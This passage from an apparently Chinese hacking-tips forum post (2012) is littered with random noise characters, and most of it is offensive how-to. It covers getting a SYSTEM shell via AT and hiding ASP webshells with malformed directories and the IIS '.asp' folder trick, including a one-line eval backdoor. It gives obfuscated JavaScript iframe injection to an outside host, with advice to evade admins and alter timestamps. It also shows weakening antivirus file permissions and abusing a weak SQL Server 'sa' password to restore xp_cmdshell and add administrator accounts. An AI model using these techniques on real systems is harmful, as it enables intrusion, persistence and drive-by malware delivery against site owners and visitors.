52、at "12:17" /interactive cmd$ U. u' K! t5 |( j: ~7 L/ A/ D5 }
执行后可以用AT命令查看新加的任务
$ i! \- g3 |1 X# a4 S用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。 ]( ]( S6 B5 H( E% `6 V
- [+ U( p1 z# C53、隐藏ASP后门的两种方法. f; p4 i2 y. K0 o# M) S$ n, }
1、建立非标准目录:mkdir images..\
1 H0 G& z8 {: s6 `/ f2 J6 n拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
/ g4 T( w5 d6 ]9 D4 W, {* r! N通过web访问ASP木马:http://ip/images../news.asp?action=login
- X& D/ y/ }+ \( [如何删除非标准目录:rmdir images..\ /s
% S. O, g' L) O( \9 `4 J/ Z2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:" I, D3 x% H) q; i
mkdir programme.asp
" @: l( c) @9 n5 j- k新建1.txt文件内容:<!--#include file=”12.jpg”-->
1 O8 s6 s3 Y1 ` B( C: }0 w* `7 [新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件, z" b9 w5 b. t' M/ u' w/ h
attrib +H +S programme.asp
: L0 a( j) v8 Q4 Z, A3 A' Z通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
; \ H( r( O: S( J0 E0 E, y+ F
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。" C8 M0 h- Y- U0 Y
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
. ~8 g/ J) R. y x* ?6 R
) N5 n& S* a' t55、JS隐蔽挂马
& }' V0 X9 H M* K; a/ {* a7 S1.4 r/ K) \2 ]( |0 g
var tr4c3="<iframe src=ht";
6 ]: P3 T$ q( M4 atr4c3 = tr4c3+"tp:/";
1 r: N7 L, l5 b: [tr4c3 = tr4c3+"/ww";
$ s$ p/ }1 `5 I4 v1 X6 B3 Jtr4c3 = tr4c3+"w.tr4";! J3 I7 x+ n) J% q& _
tr4c3 = tr4c3+"c3.com/inc/m";; J7 ?( i g0 H. G
tr4c3 = tr4c3+"m.htm style="display:none"></i";9 H( @; L% S1 X9 U- ]$ u
tr4c3 =tr4c3+"frame>'";: {/ N$ @8 f. q
document.write(tr4c3);2 i, P3 ~9 `* e' G' l9 q! q" I
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。% t* Y* _9 Y/ t: f6 s% F9 T! w
# m" x* y5 ^ `: ]+ T: r3 Z( A/ b2.. d0 `) M% z* y# z3 A/ H
转换进制,然后用EVAL执行。如
9 c5 {$ ~# h# g- v! reval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");* Y( b6 m/ C& r' w% `: g
不过这个有点显眼。7 @+ B! a& T3 Y T
3.
. a A" u0 ?0 | R4 W+ Adocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
# H1 i8 \3 U- v$ q最后一点,别忘了把文件的时间也修改下。
7 a3 A2 ]; y& a# L7 x2 G* g0 l# y0 r4 v/ e; l: a, j9 W3 u% ?
56.3389终端入侵常用DOS命令1 M1 n" J9 w9 u: @$ u' Q
taskkill taskkill /PID 1248 /t( s( y8 H( u2 F$ E; C% B- t5 N
0 v4 X( A7 T' f: Z0 }& z3 f/ U
tasklist 查进程
# c! ]* r/ I; M1 j7 E* E. {- {& w( X' {4 H7 q
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
$ B- l* H$ Y* g. J4 C' }iisreset /reboot
8 ^' D9 p* I4 I7 h3 Otsshutdn /reboot /delay:1 重起服务器
5 h9 n/ G2 F7 k6 Y& R# j+ |
* o8 W2 g$ r. s* elogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,) @4 V* ^; g/ u5 p0 Q3 I" Y
- \4 S# c) @ c, i% w+ @query user 查看当前终端用户在线情况
+ s/ b8 |4 [: h- A2 X
. P9 b* R0 b0 B }要显示有关所有会话使用的进程的信息,请键入:query process *
7 G0 Y S- z8 c9 K& g# G& n, p# w6 l; o
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2) \, ^& E: g5 p
+ [) ], S! _ d( X2 \ ^要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
1 S \1 ^$ H i) h) L. k. ~9 U4 M1 b& j( r
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
" K6 e m* {( I4 T4 E+ N! i& j5 d1 \2 @: T4 a0 ?
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
0 v5 D3 G% g0 r; g+ \* J$ p6 [
2 b* V) t" X# o9 q& P- o0 D5 K命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统" v. W( K: {* s# e' p& ~
/ _$ r& s5 a' t命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
7 l+ U! V% r! ]$ W' C* c* z7 o# M
4 H) F6 I( _% W- X命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机! u( |! p( t" Y1 }5 C# v' `" f8 @
& E0 Y* q7 i; r56、在地址栏或按Ctrl+O,输入:
9 x3 u- H: Y9 j% W0 m9 `javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
1 c, \% L% q: r0 t4 e! K) A8 k7 o% M$ G
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。4 @7 x" h' @, C) c+ V
0 [, G! ~4 @7 N
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,4 r* O; p( w' |! u, X; n, T* {; u
用net localgroup administrators是可以看到管理组下,加了$的用户的。8 d4 Z0 m z7 o% q, O
; {; c$ o9 R" M58、 sa弱口令相关命令* Z) V! m9 q* o9 Z' ?3 a& R
: G* K _" _$ x$ S2 v
一.更改sa口令方法:
( o u/ @8 B. S# _: ^) f @% v用sql综合利用工具连接后,执行命令:6 {0 `; A& t( J# \' c6 p3 g: `
exec sp_password NULL,'20001001','sa'7 m4 ]9 H3 S9 J2 F& I0 U, D
(提示:慎用!)2 L' O; V {' g7 g6 s# K* D
, {9 @# ]$ @% B. u
二.简单修补sa弱口令.
9 e. P1 S, y$ S/ q
: y4 p. C$ P6 y9 q6 _方法1:查询分离器连接后执行:
& s7 f. ~ r5 y6 c _if exists (select * from/ i [& {8 d7 o0 ~5 J& W- x
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
1 C3 e' _, {" J# @9 vOBJECTPROPERTY(id, N'IsExtendedProc') = 1). l! y- [% x& t6 U$ Q- W+ s1 T
" J8 X* E3 M+ u- E) ^: M
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'- Q+ Q! B7 T+ f8 k4 n2 [9 S
1 m, ~" G- x9 MGO, w6 y, J/ g; v2 _6 m' @% ]+ C
" x$ V: S" F( w/ `- @) ~4 g0 N然后按F5键命令执行完毕
( x7 T3 g* `. |. M
8 J, ~- ]9 H5 s2 w s4 ]; } M方法2:查询分离器连接后
: q' \9 ^1 _6 V# r' a第一步执行:use master! l2 x' W* M; q A
第二步执行:sp_dropextendedproc 'xp_cmdshell'
5 f# D4 i& l4 z' Y( N然后按F5键命令执行完毕# C. F- |. _% m
$ C0 n" g! M! e1 X# Q& \4 @% b7 \5 V, l* J3 g
三.常见情况恢复执行xp_cmdshell.0 N; J( S/ b! o/ H
! N# k8 \8 M9 \- o! C0 }* o
6 n. T9 a& l! y) E5 P
1 未能找到存储过程'master..xpcmdshell'.
! D/ N8 S# v- B8 f1 _ o 恢复方法:查询分离器连接后,
, K0 |8 f; Z7 [0 V6 t2 c第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
6 }6 Y( w& ]& J第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
0 e8 p5 c+ W# ~! c- \' P7 ]% k然后按F5键命令执行完毕* [9 e7 O8 R1 f+ n& x0 a
+ g( f8 ?% l( H) N4 v
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
: b8 T C$ `/ ^1 t% B恢复方法:查询分离器连接后,) [# ` L6 a. \- r6 R$ U
第一步执行:sp_dropextendedproc "xp_cmdshell"
, p z5 E, n, r6 E6 j第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
, p' j/ Y8 a/ Z6 \; d! R; r然后按F5键命令执行完毕, }+ C: }2 A& E* J7 \5 t, Z) j' C1 g
$ z+ N; N+ R2 i
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)+ V. F7 a7 E$ n2 E. s5 @
恢复方法:查询分离器连接后,+ w5 h( ~4 l% L2 x H# ]" k
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
) P5 { F& R% D, w0 K第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
( F. @& V9 m1 |* h$ ~ ~8 X( `然后按F5键命令执行完毕
/ y; d. K+ v! J7 y& i, A# v/ G# f7 Y) n
四.终极方法.8 K$ V: [9 u- Q+ B1 T
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! H$ B" f, i' ?& M4 T* _/ @: _2 L5 Q' q
查询分离器连接后,
' M; _& N7 w: N! c; w$ B2000servser系统:
* b- O; w% \3 k$ Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'2 c1 Z8 \3 ?5 T! S& y" N
; L. i5 M/ n0 R. A/ M; M
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'7 v" ?( D, N5 s g& b2 K! G
$ x# g, y9 ]3 i/ }# Wxp或2003server系统:
" V8 }1 T5 Q2 `
5 d5 y. B3 d% ~' t$ T5 ldeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ P# l. b2 F# x& o
S' j$ V$ i, ?& o8 Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'% A+ m/ t3 R0 x" j2 t- v
|
发表于 2012-9-15 14:51:03
收藏
分享
支持
反对